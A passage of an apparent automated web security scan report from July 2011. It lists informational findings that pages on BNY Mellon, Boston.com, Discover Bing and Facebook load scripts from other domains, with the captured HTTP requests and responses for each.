Content-Type: text/html; charset=utf-8
Content-Length: 25722


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><script type="text/
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.google.com/coop/cse/t13n?form=cse-search-box&t13n_langs=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t2.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

21.49. http://www.bnymellonam.com/core/hub/am_site_selector.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bnymellonam.com
Path:   /core/hub/am_site_selector.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /core/hub/am_site_selector.html HTTP/1.1
Host: www.bnymellonam.com
Proxy-Connection: keep-alive
Referer: http://www.bnymellonam.com/core/hub/am_site_selector.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermgi-bnymellonam-tpc.bnymellon.com-pool-80=1198603018.20480.0000

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 15:49:35 GMT
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <script t
...[SNIP]...
<!-- jQuery -->
<script type="text/javascript" src="http://ebusiness.melloninstitutional.com/lib/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

21.50. http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.boston.com
Path:   /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links HTTP/1.1
Host: www.boston.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: OAX=rcHW803KasIABjIw; s_vi=[CS]v1|26E5356B85012F68-4000011580017645[CE]; __unam=b6206f2-12fdeb21084-67db55f0-1; anonId=2115b2a8-118a-4f17-925c-f4ae050c3414; bcpage=7; __qca=P0-192291824-1311108181675; s_cc=true; s_pv=Boston.com%20home%20page; s_sq=nytbglobe%3D%2526pid%253DBoston.com%252520home%252520page%2526pidt%253D1%2526oid%253Dhttp%25253A//www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7%2526ot%253DA; s_ppv=16

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">
<!-- Methode uuid: "b12c8144-b20e-11e0-aa83-a59fd6e1b552" -->
<head>
<title
...[SNIP]...
</ul>
           <script src="http://w.sharethis.com/button/sharethis.js#publisher=e1e0ea5a-a326-4731-b1d1-f21623043511&amp;type=website&amp;button=false" type="text/javascript"></script>
...[SNIP]...

21.51. http://www.discoverbing.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=yln2iy45tia1yyebr32a2n55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: dbingvisitnew=TRUE; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:41 GMT
Content-Length: 48248


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<link rel="icon" href="https://cdndiscoverbing.blob.core.windows.net/sitecore/favicon.ico" />
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js"></script>
<script type="text/javascript" src="http://ajax.microsoft.com/ajax/jquery.ui/1.8.5/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/jquery.simplemodal.1.4.1.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/analytics.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/flashver.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/home.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/hotspots.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/searchbox.min.js"></script>

<script type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/unsupported.min.js"></script>
...[SNIP]...
<link rel="stylesheet" href="http://az10143.vo.msecnd.net/sitecore/dbing/css/VisitorIdentification.css"/>


<script language="javascript" type='text/javascript' src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/silverlight.js"></script>
<script language="javascript" type='text/javascript' src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/wmvplayer.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/tools.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/xaml.js"></script>
<script language="javascript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/videoPlayer/jwplayer.js"></script>
...[SNIP]...
<meta property="og:site_name" content="Discover Bing" />

<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
...[SNIP]...
<!--
SiteCatalyst code version: H.22.1.
Copyright 1996-2011 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script language="JavaScript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/s_code.js"></script>
<script language="JavaScript" type="text/javascript" src="http://az10143.vo.msecnd.net/sitecore/dbing/Scripts/omniture.js"></script>
...[SNIP]...

21.52. http://www.facebook.com/advertising/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /advertising/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /advertising/?campaign_id=402047449186&placement=pflo&extra_1=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.88.37
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:45 GMT
Content-Length: 22238

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/advertising\/index.php";window._EagleEyeSeed="42vQ";</scr
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.53. http://www.facebook.com/ajax/intl/language_dialog.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /ajax/intl/language_dialog.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.54. http://www.facebook.com/badges/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /badges/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /badges/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fbadges%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.92.64
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:33 GMT
Content-Length: 15265

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/badges\/index.php";window._EagleEyeSeed="emCA";</script><
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.55. http://www.facebook.com/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /careers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /careers/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.121.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:50 GMT
Content-Length: 20897

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/careers\/index.php";window._EagleEyeSeed="Ikcl";</script>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.56. http://www.facebook.com/directory/pages/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/pages/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /directory/pages/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; wd=1065x723; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.102.50
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:38 GMT
Content-Length: 49022

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="0cuF";</scrip
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.57. http://www.facebook.com/directory/people/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /directory/people/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /directory/people/ HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpeople%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.82.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:34 GMT
Content-Length: 39849

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/directory\/index.php";window._EagleEyeSeed="kzvV";</scrip
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.58. http://www.facebook.com/facebook  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /facebook

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /facebook HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fdirectory%2Fpages%2F; wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffacebook; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.89.42
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:40 GMT
Content-Length: 130477

<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" xmlns:og="http://opengraphprotocol.org/schema/" lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>Cav
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.59. http://www.facebook.com/find-friends  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /find-friends

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /find-friends?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Ffind-friends%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.95.36
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:28 GMT
Content-Length: 104185

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/vanityurl.php";window._EagleEyeSeed="ZSxE";</script><nosc
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.60. http://www.facebook.com/help/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /help/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /help/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.123.33
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 22399

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/4oh4.php";window._EagleEyeSeed="af0Z";</script><noscript>
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.61. http://www.facebook.com/mobile/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /mobile/

Issue detail

The response dynamically includes the following script from another domain:

Request

